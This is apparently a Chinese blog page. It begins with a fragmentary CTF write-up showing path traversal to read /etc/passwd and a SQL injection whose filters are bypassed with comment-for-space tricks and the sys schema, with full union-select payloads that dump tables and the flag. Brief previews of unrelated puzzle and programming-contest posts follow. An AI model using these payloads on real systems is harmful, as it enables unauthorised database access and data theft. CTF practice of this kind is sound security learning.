拿到
t是時間,可以利用time.time()獲得。f是檔名。經過base64加密。一開始給的是gqy.jpg,訪問/gqy.jpg和gpy.jpg的回顯一樣。嘗試目錄穿越在gqy.jpg後面加../可以讀到etc/passwd
提示need id,加個id引數,發現id=1或2或3有回顯,id=3'無回顯,id=3''有回顯,存在注入。
試下?id=3' union select 1,2,3#,給出過濾的字元
return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);'union/**/select/**/1,2,database()%23接著暴表名,但是過濾了or, 那麼information_schema無法使用,雙寫和大小寫or都無法繞過,這個涉及到bypass information_schema的問題了。可以參考
但是stat被過濾了,文章中提到的
sys.schema_table_statistics_with_buffer
sys.x$ps_schema_table_statistics_io
?id=666'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/sys.x$schema_flattened_keys/**/where/**/table_schema="sqlidb"%23看到了flllaaaggg,那麼應該沒有列了。直接查詢flllaaaggg。
?id=666'/**/union/**/select/**/*,1/**/from/**/flllaaaggg%232020 安恆七月賽
解壓得到乙個壓縮包和一張圖 壓縮包flag.rar是加密的,密碼應該在圖里,開始分析red blue.png找提示,用stegsolve工具分析 儲存乙個檔案 順利開啟加密壓縮包,開啟flag.txt,得到一串字元 由字元猜測為base85編碼,解碼得flag 1.file format 檔案格式,...
洛谷七月月賽P3817
小a有n個糖果盒,第i個盒中有a i 顆糖果。小a每次可以從其中一盒糖果中吃掉一顆,他想知道,要讓任意兩個相鄰的盒子中加起來都只有x顆或以下的糖果,至少得吃掉幾顆糖。輸入格式 第一行輸入n和x。第二行n個整數,為a i 輸出格式 至少要吃掉的糖果數量。輸入樣例 1 3 3 2 2 2 輸出樣例 1 ...
(續)上次周賽兩道題 kmp,bfs
時間限制 1 sec 記憶體限制 128 mb 某天某個人想去買一條手鍊,但是她比較挑剔,不但想要最美麗的,又想要最長的,手鍊的顏色可以比較多,但是又不能毫無規律的顏色多而已。她要買的手鍊必須是顏色夠多,還要有規律,什麼叫做有規律?就是有迴圈的。假如給定參照手鍊 rgb 再給乙個手鍊比如 rgbrg...